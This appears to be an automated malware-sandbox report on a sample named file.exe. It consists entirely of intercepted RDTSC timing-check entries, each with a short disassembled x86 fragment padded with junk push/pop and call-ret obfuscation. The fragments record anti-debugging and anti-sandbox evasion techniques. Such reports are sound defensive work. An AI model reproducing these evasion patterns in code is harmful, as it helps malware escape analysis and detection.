                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103363 second address: 110337A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43F0D10386h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F43F0D1038Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110337A second address: 1103384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F43F0D0DC66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103384 second address: 1103388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103388 second address: 110338E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110338E second address: 1103397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103397 second address: 110339D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104E23 second address: F91A9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F43F0D10386h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 71FB6D66h 0x00000013 mov dl, FDh 0x00000015 push dword ptr [ebp+122D08D9h] 0x0000001b mov edx, 3868ACA1h 0x00000020 call dword ptr [ebp+122D206Bh] 0x00000026 pushad 0x00000027 cmc 0x00000028 xor eax, eax 0x0000002a sub dword ptr [ebp+122D1973h], edi 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 mov dword ptr [ebp+122D1973h], ecx 0x0000003a mov dword ptr [ebp+122D3988h], eax 0x00000040 xor dword ptr [ebp+122D182Bh], eax 0x00000046 mov esi, 0000003Ch 0x0000004b sub dword ptr [ebp+122D182Bh], ebx 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 clc 0x00000056 jmp 00007F43F0D10395h 0x0000005b lodsw 0x0000005d cld 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 jmp 00007F43F0D1038Bh 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b jmp 00007F43F0D1038Ah 0x00000070 pushad 0x00000071 sbb cx, B6DCh 0x00000076 or ebx, 1E8EF24Ch 0x0000007c popad 0x0000007d nop 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104E91 second address: 1104E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104E95 second address: 1104E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104E99 second address: 1104E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104E9F second address: 1104EA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104EA4 second address: 1104F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 7D2FB6DEh 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F43F0D0DC68h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F43F0D0DC68h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 jng 00007F43F0D0DC68h 0x0000004c mov edx, ebx 0x0000004e mov dword ptr [ebp+122D1A1Ch], eax 0x00000054 mov ecx, dword ptr [ebp+122D3948h] 0x0000005a push 00000003h 0x0000005c mov dword ptr [ebp+122D1F9Fh], edx 0x00000062 add edi, 7284C510h 0x00000068 call 00007F43F0D0DC69h 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F43F0D0DC77h 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104F39 second address: 1104F3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104F3F second address: 1104FA2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43F0D0DC68h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ebx 0x00000018 jmp 00007F43F0D0DC77h 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 js 00007F43F0D0DC84h 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a jns 00007F43F0D0DC6Eh 0x00000030 push edi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104FA2 second address: 1104FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 mov esi, dword ptr [ebp+122D38F4h] 0x0000000c lea ebx, dword ptr [ebp+12446D5Bh] 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F43F0D10388h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jnp 00007F43F0D1038Ch 0x00000035 ja 00007F43F0D10386h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105051 second address: 11050A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D20C8h], edx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F43F0D0DC68h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1849h], esi 0x0000002f call 00007F43F0D0DC69h 0x00000034 push ecx 0x00000035 jmp 00007F43F0D0DC75h 0x0000003a pop ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d push ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11050A8 second address: 11050BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jbe 00007F43F0D10388h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11050BF second address: 11050E7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43F0D0DC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d ja 00007F43F0D0DC73h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105235 second address: 1105239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111723C second address: 1117245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125F09 second address: 1125F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F43F0D10386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F43F0D10386h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112603E second address: 1126074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC79h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F43F0D0DC66h 0x00000016 jmp 00007F43F0D0DC6Bh 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126074 second address: 112607C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112634E second address: 1126353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11264AE second address: 11264B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11268AC second address: 11268B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43F0D0DC66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126A2F second address: 1126A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112741C second address: 1127445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F43F0D0DC6Ch 0x0000000c jmp 00007F43F0D0DC76h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127B49 second address: 1127B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FB61 second address: 112FB8A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43F0D0DC6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F43F0D0DC76h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134762 second address: 1134785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43F0D10396h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134785 second address: 1134789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133D86 second address: 1133DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F43F0D1038Bh 0x0000000c popad 0x0000000d jo 00007F43F0D103ACh 0x00000013 push esi 0x00000014 jmp 00007F43F0D10394h 0x00000019 pop esi 0x0000001a pushad 0x0000001b jc 00007F43F0D10386h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133F45 second address: 1133F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133F49 second address: 1133F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133F4F second address: 1133F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F43F0D0DC6Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113568C second address: 11356A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D10392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135D72 second address: 1135D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136372 second address: 113637C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F43F0D10386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136643 second address: 1136649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136649 second address: 113664D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113664D second address: 1136651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11366BC second address: 11366C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113760F second address: 1137614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137614 second address: 113762C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113762C second address: 1137632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137632 second address: 1137636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11376EE second address: 11376F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11376F4 second address: 11376F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1139CD4 second address: 1139CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A826 second address: 113A82A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A560 second address: 113A565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A565 second address: 113A573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A573 second address: 113A579 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A579 second address: 113A57E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140C85 second address: 1140C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140C8A second address: 1140C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141DF3 second address: 1141DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43F0D0DC66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141DFE second address: 1141E14 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43F0D10388h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F43F0D10386h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142D3F second address: 1142D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141E14 second address: 1141E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143C15 second address: 1143C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143C19 second address: 1143C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jns 00007F43F0D10386h 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143CF1 second address: 1143CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144DE1 second address: 1144DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144DE7 second address: 1144DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144DF0 second address: 1144E12 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43F0D10386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007F43F0D10392h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147AB6 second address: 1147ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144F1B second address: 1144F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147ABC second address: 1147AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147AC0 second address: 1147AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147AC4 second address: 1147B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push edi 0x0000000c mov bl, E8h 0x0000000e pop edi 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2841h], eax 0x00000017 push 00000000h 0x00000019 jno 00007F43F0D0DC69h 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 jng 00007F43F0D0DC68h 0x00000027 pushad 0x00000028 popad 0x00000029 jo 00007F43F0D0DC6Ch 0x0000002f jng 00007F43F0D0DC66h 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B08 second address: 1148B38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43F0D1038Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F43F0D10395h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147D3A second address: 1147D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114ABE9 second address: 114ABF3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43F0D10386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114ABF3 second address: 114AC0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F43F0D0DC6Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AC0B second address: 114AC6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F43F0D10388h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, 7450B805h 0x0000002a push 00000000h 0x0000002c or dword ptr [ebp+122D211Eh], edx 0x00000032 push 00000000h 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 jmp 00007F43F0D10397h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148D0C second address: 1148D32 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43F0D0DC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43F0D0DC77h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148D32 second address: 1148D3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CB79 second address: 114CB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E82 second address: 1149E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148D3C second address: 1148D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CB7D second address: 114CBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43F0D10397h 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1910h], esi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F43F0D10388h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2E6Ch], eax 0x00000035 push 00000000h 0x00000037 or ebx, dword ptr [ebp+122D380Ch] 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CBD6 second address: 114CBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114ED53 second address: 114ED59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
